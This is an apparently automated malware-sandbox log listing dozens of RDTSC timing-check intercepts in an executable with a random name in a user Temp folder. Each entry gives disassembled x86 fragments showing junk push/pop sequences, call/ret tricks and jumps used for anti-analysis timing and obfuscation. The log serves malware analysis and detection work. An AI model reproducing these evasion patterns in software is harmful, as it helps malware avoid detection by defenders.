Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B19FBF second address: B19FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1144C8B197h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1144C8B192h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B19FF4 second address: B19FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B19FF8 second address: B19FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1D500 second address: B1D504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1D504 second address: B1D508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1DBEA second address: B1DBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1DBEE second address: B1DC71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F1144C8B188h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 call 00007F1144C8B198h 0x0000002c jmp 00007F1144C8B18Fh 0x00000031 pop esi 0x00000032 push 00000000h 0x00000034 mov esi, dword ptr [ebp+122D2A35h] 0x0000003a push 00000000h 0x0000003c jne 00007F1144C8B18Ch 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jnp 00007F1144C8B18Ch 0x0000004b ja 00007F1144C8B186h 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1DC71 second address: B1DC7B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F114478E73Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1F21B second address: B1F221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1F221 second address: B1F225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1F225 second address: B1F229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1F229 second address: B1F2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F114478E738h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F114478E738h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 call 00007F114478E73Fh 0x00000046 pop edi 0x00000047 mov dword ptr [ebp+122D1B94h], edx 0x0000004d push 00000000h 0x0000004f jmp 00007F114478E741h 0x00000054 push eax 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B20538 second address: B2053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B235D3 second address: B235D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B246AF second address: B246B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B246B4 second address: B246F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F114478E748h 0x00000011 je 00007F114478E736h 0x00000017 popad 0x00000018 pushad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B24871 second address: B24877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B24877 second address: B2487B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B24967 second address: B2496D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2496D second address: B24971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AD647D second address: AD6481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B29A4C second address: B29A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F114478E747h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B29A70 second address: B29AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov di, dx 0x0000000a push 00000000h 0x0000000c or dword ptr [ebp+122D2739h], edx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F1144C8B188h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e cld 0x0000002f push eax 0x00000030 push ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B29BFF second address: B29C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2EA02 second address: B2EA47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+122D2899h], esi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F1144C8B188h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push ebx 0x0000002d mov di, 9DCDh 0x00000031 pop ebx 0x00000032 push 00000000h 0x00000034 mov edi, esi 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2EA47 second address: B2EA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2EA4B second address: B2EA68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2FAFF second address: B2FB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2ECD3 second address: B2ECD9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2CC87 second address: B2CC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2CC8D second address: B2CC9F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1144C8B186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2CC9F second address: B2CCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2FCB2 second address: B2FCB8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2FCB8 second address: B2FCC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F114478E736h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B2FCC2 second address: B2FCC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B31BE0 second address: B31BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F114478E736h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B31BEA second address: B31C01 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1144C8B186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F1144C8B188h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B31C01 second address: B31C8B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F114478E747h 0x00000008 jmp 00007F114478E741h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov edi, 4D95ADC0h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F114478E738h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 jne 00007F114478E73Ch 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F114478E738h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov dword ptr [ebp+1244A55Fh], esi 0x00000059 xchg eax, esi 0x0000005a jng 00007F114478E740h 0x00000060 push eax 0x00000061 push edx 0x00000062 push ecx 0x00000063 pop ecx 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B30E4F second address: B30E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B31E24 second address: B31E32 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B31E32 second address: B31E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B31EF1 second address: B31EFB instructions: 0x00000000 rdtsc 0x00000002 je 00007F114478E73Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B3644E second address: B36460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1144C8B18Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B3AEB6 second address: B3AEBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B3AEBC second address: B3AEC6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1144C8B18Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B3B069 second address: B3B079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F114478E73Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B407D4 second address: B40802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F1144C8B196h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f js 00007F1144C8B192h 0x00000015 jbe 00007F1144C8B18Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B464F2 second address: B46514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Eh 0x00000007 jnp 00007F114478E736h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jc 00007F114478E74Ch 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B458BB second address: B458BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B458BF second address: B458D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F114478E736h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pop ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B458D4 second address: B45926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1144C8B197h 0x00000009 jmp 00007F1144C8B18Fh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1144C8B199h 0x0000001c jnc 00007F1144C8B186h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B45BB4 second address: B45BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B45D42 second address: B45D4C instructions: 0x00000000 rdtsc 0x00000002 je 00007F1144C8B186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B45D4C second address: B45D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F114478E744h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B45D82 second address: B45D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B45D86 second address: B45DB6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F114478E736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F114478E749h 0x00000014 jng 00007F114478E736h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B45DB6 second address: B45DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B45F08 second address: B45F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F114478E745h 0x00000009 jmp 00007F114478E747h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B46352 second address: B46357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B46357 second address: B46383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F114478E742h 0x00000009 jmp 00007F114478E73Fh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B46383 second address: B46387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B46387 second address: B4638D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4AD68 second address: B4AD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1144C8B18Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4AD79 second address: B4ADA0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F114478E747h 0x00000008 jmp 00007F114478E741h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F114478E736h 0x00000015 jne 00007F114478E736h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B49B04 second address: B49B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B171AD second address: B171B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B17464 second address: B1746A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1746A second address: B17474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F114478E736h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B175B4 second address: B175BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F1144C8B186h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B17775 second address: B177B6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F114478E73Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F114478E738h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 xor dword ptr [ebp+122D27DCh], edi 0x0000002b nop 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push edi 0x00000030 pop edi 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B177B6 second address: B177F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F1144C8B19Dh 0x0000000f jmp 00007F1144C8B197h 0x00000014 popad 0x00000015 push eax 0x00000016 push edi 0x00000017 pushad 0x00000018 jng 00007F1144C8B186h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B178EA second address: B178F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
